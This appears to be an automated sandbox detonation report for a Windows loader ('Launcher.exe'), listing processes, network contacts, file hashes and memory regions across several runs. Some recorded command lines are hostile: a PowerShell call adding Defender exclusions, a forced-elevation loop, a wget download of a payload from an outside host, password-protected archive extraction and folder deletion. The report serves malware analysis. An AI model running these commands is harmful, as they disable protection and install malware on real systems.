memory/4700-250-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-251-0x000001E22A080000-0x000001E22A0A0000-memory.dmp
memory/4700-253-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-252-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-254-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-255-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-256-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-257-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-258-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-259-0x000001E22A9A0000-0x000001E22A9C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 7cbcb0584aacbcc1efc3586f7dbb9fa2 |
| SHA1 | acc6af322b4912da08cc9de165727caafd9076ac |
| SHA256 | 8f4469e81697d12ac394a703e5b8e3cecd2428e9a17118c4f86c56d5526b1944 |
| SHA512 | 64afc71897eedad4bba83be8d8f541cee6dede8da7ac36767eb199b15f9e16399dd9d47b5171d717205f687f27dc8cc15e432d25fa1c2db03283f50a73f79918 |
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | b1ad4699348b7ae4fe4e4de26f336c34 |
| SHA1 | 8f91abd21f56df1eb6e1b8bedb0a9307fc30573d |
| SHA256 | 742c0143ab6fc85bfbc7cff5553b6123a8e21e1f749f91c6d1a52f9709783a2e |
| SHA512 | f85c57b50162a09e631840d226782b5ad0f21eb810d5d1aa066b099428acaa635b0b8ca71f22cc65a0f2749b7a2010a4d0b9b528293b2d8bac8e8acf530ba55b |
memory/3160-265-0x0000000000340000-0x00000000003BA000-memory.dmp
memory/3780-268-0x0000000000400000-0x0000000000449000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
| MD5 | 33647ac8da047db4ea99e6d11ca9bfea |
| SHA1 | c6d10b4f7ac56cb448aeea39742aa94d821edf41 |
| SHA256 | f5ee44fafe26da97d3b357a2c3e0e637c907470d915105ee38d39b0089c92a20 |
| SHA512 | 3b68a138b255c338160d2bf36216113cc8dc49dead083fb34e6a817aa37bceffb48cbba7da3069063a556bb9b68956a7e50e046cc8caf279f45650b2939d31de |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e9b4eab31a7ea89783b4db363fec9d80 |
| SHA1 | ca072f111738a8b5facacc26af6bb881dafb768a |
| SHA256 | 37e88d4d29328ab9e79d2ab81caa08677fb2017f8df9c5510042df925d1a5eb0 |
| SHA512 | 7f4da930d2eddda65067c644a9d3ca40e8ddac24ed4b4f0d3b1097024505bde984c0d735a2d5ca183b138b34e1c906c99b924b9e624ccf31ec22ce320fdf3c01 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
98s
Max time network
221s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | tcp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wy3kgglm.gyb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1580-9-0x0000022D42880000-0x0000022D428A2000-memory.dmp
memory/1580-10-0x00007FFC3C910000-0x00007FFC3D3D1000-memory.dmp
memory/1580-11-0x0000022D428D0000-0x0000022D428E0000-memory.dmp
memory/1580-12-0x0000022D428D0000-0x0000022D428E0000-memory.dmp
memory/1580-13-0x0000022D428D0000-0x0000022D428E0000-memory.dmp
memory/1580-16-0x00007FFC3C910000-0x00007FFC3D3D1000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
118s
Max time network
138s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
Network
Files
memory/2824-4-0x000000001B2E0000-0x000000001B5C2000-memory.dmp
memory/2824-5-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp
memory/2824-6-0x0000000002610000-0x0000000002618000-memory.dmp
memory/2824-7-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp
memory/2824-8-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2824-9-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2824-10-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2824-11-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2824-12-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
167s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1320 --field-trial-handle=2256,i,6057863739127169200,6895476048812676039,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| IE | 209.85.203.95:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
memory/3088-0-0x000001736E760000-0x000001736E782000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tnwnvjbt.lb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3088-10-0x00007FFF800A0000-0x00007FFF80B61000-memory.dmp
memory/3088-11-0x000001736E960000-0x000001736E970000-memory.dmp
memory/3088-14-0x00007FFF800A0000-0x00007FFF80B61000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240215-en
Max time kernel
119s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/2724-0-0x00000000001F0000-0x00000000001F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab254E.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar2570.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/2956-57-0x0000000073510000-0x0000000073ABB000-memory.dmp
memory/2956-59-0x0000000002AB0000-0x0000000002AF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar278D.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2956-170-0x0000000073510000-0x0000000073ABB000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
121s
Max time network
144s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
Files
memory/2872-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
141s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:26
Platform
win7-20240221-en
Max time kernel
255s
Max time network
277s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
Files
memory/2760-0-0x0000000000280000-0x0000000000281000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab7EC3.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar7F14.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar845C.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1228-180-0x0000000000170000-0x0000000000171000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5b9b2cbca537913ad94f0c4e4f8c3f67 |
| SHA1 | 7979f61ca369606bd2e5224eb0dbf17aa173e07d |
| SHA256 | 7511a83052f13e7adbdb2ee27aa9c1b2b71026daab594ebc2d61a501dd08cd41 |
| SHA512 | 57762a5cf0f537197cbe21190576009225eabe483a10d62d4ccc6cb432c17527925158145e36b8343b666d348f11df7bda928f9d7ac3abb474ab2e559e34c776 |
memory/2688-311-0x0000000073290000-0x000000007383B000-memory.dmp
memory/2688-340-0x0000000073290000-0x000000007383B000-memory.dmp
memory/2688-342-0x0000000002700000-0x0000000002740000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
memory/2124-348-0x00000000001C0000-0x00000000001C1000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 33728754c736b6828bf4c56c4b09b7f5 |
| SHA1 | 378e30a029be72535349aef5132134f826732777 |
| SHA256 | 6344164e001604dde050792efd3e7a4e9577fccb9ccf77e54857d8fde5565322 |
| SHA512 | c89635126f5b6838ae30545fd8363a8f370c0803d2603110d399c03f3cb0b42b8b8e7e43c4d8daafc5ad803e785dbf9659aed39b303a12641f22336e319cce2b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cd60257de654d3640ac9bd43d9806a9c |
| SHA1 | 786950988626ef3ad88213121079e356cc475106 |
| SHA256 | 8cbb264485c41760ecd431d48e7248b3f5bdc1274483ec1ee8da83be9f16d418 |
| SHA512 | 6a89668c6b1271a0a1da4687938cd796eada2b3903a2cdbb6fd956c28aca9ac9460ad380fe41ab512494eb44b639b53108c9e82bc69cac88ce3f464997f4a437 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CABB6PJHS87B2BMEP1OW.temp
| MD5 | 2f72d08f5417da285dbcf2226d9ce666 |
| SHA1 | fa408d5d7ae829c7c35c35c2919913198682412c |
| SHA256 | 339aa4c37485691e531034f8f47ef179e995243779eaab3ceddb815d3119f129 |
| SHA512 | 294703ae63e54877b7810f63875232c89ee670c60266c07bf83c5eac12024c6f8ce8b5d8e5ce89b2d171e8fe8fa20fa4cb5b7e02a1ff00b2723006040f197bd4 |
memory/2208-390-0x0000000073290000-0x000000007383B000-memory.dmp
memory/2208-391-0x00000000028D0000-0x0000000002910000-memory.dmp
memory/2208-445-0x0000000073290000-0x000000007383B000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 24311a1d49cf6be9891bb42a8f272349 |
| SHA1 | 9e99df7f5cadc20ae4ff05e4ea8f71db2440e3ab |
| SHA256 | b6e1dce045470e50ba85a8b7b37275c2c580bb98bad1f357581c54b091668b1d |
| SHA512 | 5f3eda3a5481b1ef2ba7b2fb3dcbb7a016702378e9b4b88d9c272beb9ad619e653367b1863a079401e9ea8a6880d445f66ddb443e294d02387d8039f9f23f565 |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2c31dcb6fd28056669a10b3d15e7f694 |
| SHA1 | 26ae1f2a2b617ed23955274500e03851d743e276 |
| SHA256 | 8a4c984cfe438ce3570121b83a07a35d23a66a32154e55ab21903927eca0d34d |
| SHA512 | 2dd33fa2da9c46e37c8fe21cd5d08334e5584e1582b9249615ab3a095229b86bba9a24a22af8d4b27ad782d31c66b7fe34514e37843285424198a28b0682cd98 |
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 4dae29bf9585d883c4e6301935d7a420 |
| SHA1 | 41e92c2fdc8efa449a886d66deffac95b1dec8a2 |
| SHA256 | a9c6f5d587f85de564edebe5d06ff6b039f698a06f61c7ff9ec163cd610e3c80 |
| SHA512 | c0f2b1c2c950eec56d113c953a1d5c9d2e5a1f89f42aae044fb94198de49fcafb21f9baf7e414505ac6298e0bae132e61e9938e68d2aaceafd504012abfbc86e |
\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 2a66ab9a40af17dc74b5cf4d6b69f0fb |
| SHA1 | f10f8ee52e1a1ee672f061c027c853a45f4f47f4 |
| SHA256 | c28508b157f8eb5b4018534d272a432b65cd7e0365a0fa44f562e735a2d6365b |
| SHA512 | 8c9e84b41b361aaea68cf64050881a2492c1a85a31c1f18d56c40f9d13f3494af2571f94fd5048de73e77434e1397abd6ed13b219c2d97ebfce4b3fa85219c9c |
memory/2504-514-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2504-515-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2688-518-0x0000000002700000-0x0000000002740000-memory.dmp
memory/2504-521-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
